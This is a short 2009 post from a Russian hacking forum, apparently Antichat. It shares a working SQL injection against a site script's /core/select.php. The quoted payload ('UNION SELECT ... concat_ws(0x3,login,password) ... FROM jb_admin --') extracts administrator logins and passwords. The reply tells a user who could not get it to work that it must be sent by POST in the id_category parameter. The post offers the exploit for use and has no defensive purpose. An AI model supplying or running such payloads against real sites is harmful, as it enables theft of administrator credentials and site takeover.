16.05.2009, 23:10
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Сообщение от demon201984
SQL-INJ
POST запрос к /core/select.php
aaaaaaa' UNION SELECT 1,2,concat_ws(0x3,login,password),4,5,6 FROM jb_admin --
Вывод будет в последнем элементе выпадающего списка
Уязвимый кусок кода: целиком весь файл)
Пробовал вводить в строке браузера этот запрос выводит лишь список категорий в последнем элементе выпадащего списка ничего нет.
Запрос вводил в формате: http://www.sait.ru/core/select.php?aaaaaaa' UNION SELECT 1,2,concat_ws(0x3,login,password),4,5,6 FROM jb_admin --
Я что-то неверно ввожу или автор этот баг уже исправил?
Читать умеешь? POST запрос
PS: переменная id_category
|
|
|